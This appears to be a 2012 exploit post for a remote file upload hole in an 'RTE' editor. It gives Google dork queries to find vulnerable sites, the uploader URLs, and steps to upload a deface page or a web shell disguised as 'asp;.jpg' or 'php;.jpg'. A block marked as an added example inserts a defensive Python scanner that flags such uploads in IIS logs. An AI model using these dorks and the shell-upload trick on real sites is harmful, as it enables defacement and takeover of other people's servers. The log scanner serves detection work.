8/06/2012

RTE Remote File Upload Vulnerability

Google Dorks

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
inurl:/rte/RTE_popup_file_atch.asp
inurl:/admin/RTE_popup_file_atch.asp


Exploit: 

http://www.website.com/rte/RTE_popup_file_atch.asp
or
http://www.website.com/admin/RTE_popup_file_atch.asp



Go to the URL and upload your deface page, or upload your shell as asp;.jpg or php;.jpg
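
For defenders checking whether a site that exposes this uploader has been hit, the following added example (not part of the original post) scans IIS W3C extended-format access logs for POSTs to RTE_popup_file_atch.asp and for requests to script-named or HTML files under my_documents/my_files. The sample log lines, their field order and the extension lists are constructed assumptions.

```python
import re

# Constructed sample in IIS W3C extended log format (not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-06-08 10:01:02 192.0.2.10 GET /rte/RTE_popup_file_atch.asp - 200
2012-06-08 10:01:40 192.0.2.10 POST /rte/RTE_popup_file_atch.asp - 200
2012-06-08 10:02:05 192.0.2.10 GET /rte/my_documents/my_files/A1B_x.asp;.jpg - 200
2012-06-08 10:03:00 198.51.100.7 GET /rte/my_documents/my_files/logo.jpg - 200
2012-06-08 10:04:00 198.51.100.7 GET /admin/my_documents/my_files/3F2_page.html - 200
2012-06-08 10:05:00 198.51.100.7 GET /index.asp - 200
"""

UPLOADER = re.compile(r"/RTE_popup_file_atch\.asp$", re.I)
UPLOAD_DIR = re.compile(r"/my_documents/my_files/([^/]+)$", re.I)
# Assumed list of server-side script extensions; extend for your stack.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|php)(;|\.|$)", re.I)
ACTIVE_EXT = re.compile(r"\.(html?|js|svg)$", re.I)


def scan(log_text):
    """Return (line_no, client_ip, reason) for each suspicious request."""
    fields, hits = [], []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is configured per server
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem, ip = row.get("cs-uri-stem", ""), row.get("c-ip", "?")
        if UPLOADER.search(stem) and row.get("cs-method") == "POST":
            hits.append((n, ip, "upload-post"))
        m = UPLOAD_DIR.search(stem)
        if m:
            name = m.group(1)
            if ";" in name or SCRIPT_EXT.search(name):
                hits.append((n, ip, "script-name-in-upload-dir"))
            elif ACTIVE_EXT.search(name):
                hits.append((n, ip, "html-in-upload-dir"))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any hit is a reason to review the files in the upload directory, put the uploader page behind authentication or remove it, and disable script execution for the upload folder.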


Demo :

You'll see your uploaded file URL in this box

More Demo Websites :

